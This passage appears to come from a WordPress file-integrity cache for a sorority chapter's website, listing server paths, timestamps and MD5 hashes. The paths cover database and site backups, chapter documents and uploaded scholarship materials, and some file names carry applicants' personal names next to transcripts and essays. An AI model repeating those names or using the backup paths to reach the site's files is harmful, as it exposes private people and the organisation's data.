/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-uploads.zip\":{\"d\":1561182749,\"h\":\"f30e30b323e4c1b90b527478edfce115\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-plugins.zip\":{\"d\":1521699543,\"h\":\"43e251e448cb54482bf83e0cc1f4c95f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.c37c898058f5.txt\":{\"d\":1548148615,\"h\":\"5365c99e3ede335b7b8ecc444a78192a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-uploads2.zip\":{\"d\":1537595659,\"h\":\"de8763feddde115e868b99760420e93e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.ec3cca157310.txt\":{\"d\":1526978468,\"h\":\"41135f930b8aa06244f79313f949a1db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-uploads.zip\":{\"d\":1534918366,\"h\":\"685f079bf6369bedc92ff1e97e7d5234\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-db.gz\":{\"d\":1563774811,\"h\":\"e76e26d91a1c0f9daf972f7e7b513a47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-uploads.zip\":{\"d\":1555912388,\"h\":\"e07ed7c5dbc93531862bd7457b36e581\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.4299d32b2219.txt\":{\"d\":1521708954,\"h\":\"58a39500a7eb4ef54d021b1773340dfa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-plugins.zip\":{\"d\":1537595601,\"h\":\"5523db439eee61f2ae41d8313f614e93\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-others.zip\":{\"d\":1524376337,\"h\":\"9f547a016b404e050a6b181a5a15029b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-uploads.zip\":{\"d\":1516515886,\"h\":\"53fd7c03164e39f16655c083ffab340d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-plugins.zip\":{\"d\":1540187458,\"h\":\"c90b1f8d1c6417cf0a34180458ecd634\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-db.gz\":{\"d\":1542866747,\"h\":\"4ed7bb0ff011a3dd403090b890ae2199\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-uploads.zip\":{\"d\":1537595646,\"h\":\"5d44a7bc4cdf3c23fb2798e2ef9a9909\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-uploads.zip\":{\"d\":1553233959,\"h\":\"119d61ce31f88172773fb0acb1adcc19\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-themes.zip\":{\"d\":1524376275,\"h\":\"f61f851b2bd0ac7034f00cb39d25e4c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.3e57bd884dff.txt\":{\"d\":1555923245,\"h\":\"85bbb9a3b73c06a97db65e772cfd98d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-plugins.zip\":{\"d\":1508737747,\"h\":\"7c30dca2dd8af135f3c2ed9620af528b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-db.gz\":{\"d\":1516515915,\"h\":\"c513e31466ffde3d1368fb8e27633fae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-db.gz\":{\"d\":1553234001,\"h\":\"f473ff195c7186755b0d6c4a8033cb1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.7e35b1e7831a.txt\":{\"d\":1513927421,\"h\":\"24e97e08a978c2ffcdca4687f1049c7f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-db.gz\":{\"d\":1508737826,\"h\":\"4d1570ac459ada8e7a47c80c410f6c02\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-plugins.zip\":{\"d\":1542866658,\"h\":\"8499325d703dac65f88f0fe749877316\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-themes.zip\":{\"d\":1532240715,\"h\":\"f61f851b2bd0ac7034f00cb39d25e4c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-plugins.zip\":{\"d\":1566454160,\"h\":\"44aa3666c97996cbab65a39835ef612a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.36f2abdd31bf.txt\":{\"d\":1532265588,\"h\":\"24e3ebbc48aed0a21f1cb36ef222515b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-themes.zip\":{\"d\":1508736478,\"h\":\"3c6bdea4bf04eb41f338a1cf0cc586fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-others.zip\":{\"d\":1519106620,\"h\":\"4ccbc082c5c567ea7f339a827dbae85f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-db.gz\":{\"d\":1561182801,\"h\":\"dbbd4fa0ce12f63599cf5cc32a075662\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.218806f67cc0.txt\":{\"d\":1566460056,\"h\":\"69f0f0d2c379fff44050f1c2509491fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-plugins.zip\":{\"d\":1529648457,\"h\":\"b55b50bad59968c4c5ebd2cab1a6c6f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/.htaccess\":{\"d\":1568299062,\"h\":\"5cc8a02be988615b049f5abecba2f3a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-db.gz\":{\"d\":1540187545,\"h\":\"f8f708d17c0dd0dd0383b5ce3a77dc4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-uploads2.zip\":{\"d\":1534918378,\"h\":\"bde7639b56eceedee6673470d400e52b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-db.gz\":{\"d\":1558506146,\"h\":\"f2fa4f6822b1ff2c3d44e421fba280ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-uploads.zip\":{\"d\":1540187506,\"h\":\"e1c9f453851fb7565fd4b82ff15af733\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-others.zip\":{\"d\":1563774800,\"h\":\"fffe6a580b5af844e952327172117d6c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-themes.zip\":{\"d\":1529648460,\"h\":\"f61f851b2bd0ac7034f00cb39d25e4c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-plugins.zip\":{\"d\":1519106547,\"h\":\"6cb133f33dd5e226981d78231f18f2cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-uploads.zip\":{\"d\":1545458717,\"h\":\"f9221197abc1e4984f206ab8179839d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-db.gz\":{\"d\":1526969297,\"h\":\"9daef6a757a575725cb17737af10170c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-uploads.zip\":{\"d\":1532240754,\"h\":\"dd8ac7829fb0e7e429e7733d3e74147a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-db.gz\":{\"d\":1534918404,\"h\":\"c60dffe64b7d8fec97ecf3a70008b51d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-uploads.zip\":{\"d\":1513922255,\"h\":\"34bb007f5b95be3fbe6187e2bc215881\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-db.gz\":{\"d\":1548136852,\"h\":\"bd67b0dcc573187c7eb1b17473457c7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-db.gz\":{\"d\":1532240791,\"h\":\"184b3481b119605f0c80f6046c94e9c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-db.gz\":{\"d\":1508736555,\"h\":\"67a82f7f0e94010dc3101ee0297ba91a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-others.zip\":{\"d\":1513922273,\"h\":\"dbd31088df72c4074349379d4df23428\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-uploads2.zip\":{\"d\":1526969278,\"h\":\"7c7a40fec57bb8e6975eaf6c0f19394b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-uploads.zip\":{\"d\":1508736525,\"h\":\"550285bfb70c18c9e2e0d2a947ddf923\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-uploads2.zip\":{\"d\":1558506119,\"h\":\"5acafff644d71de659d9b0ff21481f52\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-uploads2.zip\":{\"d\":1548136829,\"h\":\"30f7358558f1f99b3f76710b047f904b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.5e2c9677cd19.txt\":{\"d\":1540196974,\"h\":\"45d52786a8fd12b752bd885961e2342a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-uploads2.zip\":{\"d\":1563774789,\"h\":\"7b11e280f91510b08694faa9c2732fe2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-plugins.zip\":{\"d\":1534918306,\"h\":\"1e2d5aba9a216c57251ad9a0643c4ab3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-plugins.zip\":{\"d\":1526969226,\"h\":\"2d243b127573a5dd6bb2e32f543d18ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-uploads2.zip\":{\"d\":1529648516,\"h\":\"2d08607b2a7ffbcad3038f090aad2dfa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.ba4609141dcc.txt\":{\"d\":1529663329,\"h\":\"0b60ad0421889872a6c8119d65467d85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-uploads2.zip\":{\"d\":1555912407,\"h\":\"292a4115bdc80429a0c99fa4a694fdf8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-others.zip\":{\"d\":1566454246,\"h\":\"292887fafc786a089ccf0b2489c289f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-plugins.zip\":{\"d\":1563774705,\"h\":\"ae2bf31645fb2355e35106b765edde64\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-uploads.zip\":{\"d\":1519106594,\"h\":\"857d4dd13b1f143556f4b95d82b79832\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-db.gz\":{\"d\":1537595678,\"h\":\"320cf73633e23675c8c683debefcf70d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.f14af0ac5a6f.txt\":{\"d\":1508736597,\"h\":\"2a2b802771017f02f2218457688a91e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/ai1wm-backups\\/web.config\":{\"d\":1484533649,\"h\":\"db5b1a25ad0038f2ccbf2afcd09dbc12\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/ai1wm-backups\\/zphiblgz.org-20171023-051735-440.wpress\":{\"d\":1508735938,\"h\":\"3e1bc5da3c06921e114793de2ba4debf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/ai1wm-backups\\/index.php\":{\"d\":1484533649,\"h\":\"7dc6dad897b701b3d3dc016b6c648dfc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/ai1wm-backups\\/zphiblgz.org-20180108-230520-641.wpress\":{\"d\":1515453010,\"h\":\"1ebc946e35c08478a164c9b23e867922\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/ai1wm-backups\\/.htaccess\":{\"d\":1568299062,\"h\":\"86d724037b08b6d0027e04207f4ab5db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/advanced-cache.php\":{\"d\":1483048781,\"h\":\"13fae91ceacd450584e43d1d9f7286d8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins.zip\":{\"d\":1484533540,\"h\":\"bbb996f8c593361f096db7ee42cceaf2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/sms.zip\":{\"d\":1514260118,\"h\":\"50c729fb6f90857cf216154aea7e9b1a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/index.php\":{\"d\":1326042071,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/install.php\":{\"d\":1473863615,\"h\":\"f22dbb13109ed0e2f7120a474fe4f0b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/1484681989wpdm_11 Nov 2016 - Basileus Briefing.docx\":{\"d\":1484681989,\"h\":\"03d6f6ed46e58f1bbad9fd6f8356b5bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/Authorization Form.pdf\":{\"d\":1484610393,\"h\":\"c2c44de6a01da41fed379b75fe6bd5fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/AACR Committe Report - 111916.docx\":{\"d\":1484612787,\"h\":\"a121b987574fea96fcbbc64f4eb7268b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/11 Nov 2016 - Chapter Mtg Agenda.doc\":{\"d\":1484612815,\"h\":\"85b5f6560095f836735ab62bf60b0c90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/1484681948wpdm_AACR Committe Report - 111916.docx\":{\"d\":1484681948,\"h\":\"a121b987574fea96fcbbc64f4eb7268b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/1484682001wpdm_AACR Committe Report - 111916.docx\":{\"d\":1484682001,\"h\":\"a121b987574fea96fcbbc64f4eb7268b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/OneDrive-2017-01-16.zip\":{\"d\":1484612706,\"h\":\"473ed7873bf3b12621294c8066b53540\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/.htaccess\":{\"d\":1568299062,\"h\":\"978755b920bf05ef319f2e9c5fe7a61b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/Member in Good Standing_21716.pdf\":{\"d\":1484681551,\"h\":\"4183fd93d7991f723cb3533cbb617420\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/11 Nov 2016 - Basileus Briefing.docx\":{\"d\":1484612808,\"h\":\"03d6f6ed46e58f1bbad9fd6f8356b5bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2014\\/10\\/LGZ-Website-Wordpress-Quick-Guide.docx\":{\"d\":1412729292,\"h\":\"3b47e7ace142f856ba474958e73362bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2014\\/12\\/LGZPressRelease.pdf\":{\"d\":1483459356,\"h\":\"af7f0ac27b65ca942d8a97c3ea3e1bdf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2014\\/11\\/Scholarship-Criteria-Draft-2.docx\":{\"d\":1415765412,\"h\":\"2afd78aeec0aeaf6056208a5aefb88f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2014\\/11\\/Scholarship-ApplicationDraft-2.docx\":{\"d\":1415765406,\"h\":\"4a1ba53fd4f75216377813b51ada4d90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2014\\/11\\/ZETA-LGZ-Current-Roster-2014-2015.doc\":{\"d\":1415768659,\"h\":\"f7ba7e727dcab5618bdf59325137f690\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/woocommerce_uploads\\/index.html\":{\"d\":1509146991,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/woocommerce_uploads\\/.htaccess\":{\"d\":1568299062,\"h\":\"5cc8a02be988615b049f5abecba2f3a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/wc-logs\\/index.html\":{\"d\":1480693533,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/wc-logs\\/.htaccess\":{\"d\":1568299062,\"h\":\"5cc8a02be988615b049f5abecba2f3a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2017\\/10\\/Spirit-Night-2.pdf\":{\"d\":1508733409,\"h\":\"5f7862010aca476ffbe7ede35fd50a77\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2017\\/04\\/SpiritNight-1.pdf\":{\"d\":1492273227,\"h\":\"653679bda2e23fbfa665b4b827f0098b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2017\\/01\\/Final2017HSApplication.docx\":{\"d\":1484114010,\"h\":\"b6e606eed5309d62f19a46cbe3bdaeb4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2017\\/01\\/LGZScholarshipReleaseForm.pdf\":{\"d\":1506136338,\"h\":\"69fc91c5d04fb06696156bb08effdaef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2017\\/01\\/Final2017HCCCApplication.docx\":{\"d\":1484114026,\"h\":\"a6e980094eb887cd5e3b862ab1dc6ebb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2017\\/01\\/101616-minutes.doc\":{\"d\":1484612651,\"h\":\"b102f9de2398cda842b792f98d1cb3c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2017\\/01\\/FINAL2017APPAPartnership-2.pdf\":{\"d\":1484580356,\"h\":\"5055d149682eecfad726f31756e56667\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/10\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/10\\/W.Ruth-Conway-Scholarship.pdf\":{\"d\":1539633186,\"h\":\"35c884b76d6033845d0abee7a394e1f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/10\\/Kaforcha_Sandra_0534285_10_15_2018.pdf\":{\"d\":1539633186,\"h\":\"f172ab42ae40ff8e5e51a4893fe178b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/10\\/image.pdf\":{\"d\":1539633186,\"h\":\"497c1965ae522354dda9b7fc67138c61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/08\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/08\\/Test2.docx\":{\"d\":1534797407,\"h\":\"b667785153466d263a308d4b7a94f60d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/08\\/Test.docx\":{\"d\":1534797407,\"h\":\"b667785153466d263a308d4b7a94f60d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/08\\/Test1.docx\":{\"d\":1534797407,\"h\":\"b667785153466d263a308d4b7a94f60d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Ayaba_Mercy_unofficial-Transcript.pdf\":{\"d\":1522090894,\"h\":\"78f7722c2f8ac3535c09fc8e8a7bae7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Transcript2.pdf\":{\"d\":1522506417,\"h\":\"d57ecddd2c892177208171c13229edf5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/LTC-Transcript-through-Q22018.pdf\":{\"d\":1520996384,\"h\":\"5596203ebe37b799de48a7029f9f309b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Kyton-Ovide-Essay.pdf\":{\"d\":1520979070,\"h\":\"dcd9cc252a269a5e78463efd846f86b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/ruth-conway-release-form.pdf\":{\"d\":1522369381,\"h\":\"95fa0e1c2d4f4aa508262b7fa620892f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/new-doc-2017-12-15-16.35.38_3.pdf\":{\"d\":1521047774,\"h\":\"5eb9b269c30ff90ee9c6f5a943d3ccdb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/If-you-had-access-to-unlimited-resources.docx\":{\"d\":1522455030,\"h\":\"4d4d08731625bed66418a497f3b97fb8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/LGZ-ScholarshipReleaseForm_Signed2.pdf\":{\"d\":1522541050,\"h\":\"c8335df86b31e40e33e8077ea030b165\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Scholarship-Essay.docx\":{\"d\":1522089559,\"h\":\"45620adef3de7525d0cf0cab92ecffc2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/WRC-Scholarship-application_Laurence.pdf\":{\"d\":1520996384,\"h\":\"ac6c83d5900a5500f83c0396e75c7040\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Ruth-Conway-scholarship-1.docx\":{\"d\":1522369381,\"h\":\"3ccd29caa3ae3b6702a2b0fb0e07936d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/MA_Ruth-Conway-Scholarship-Essay.docx\":{\"d\":1522553705,\"h\":\"6db1eeb76edbeb89fa72460054ed2040\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploa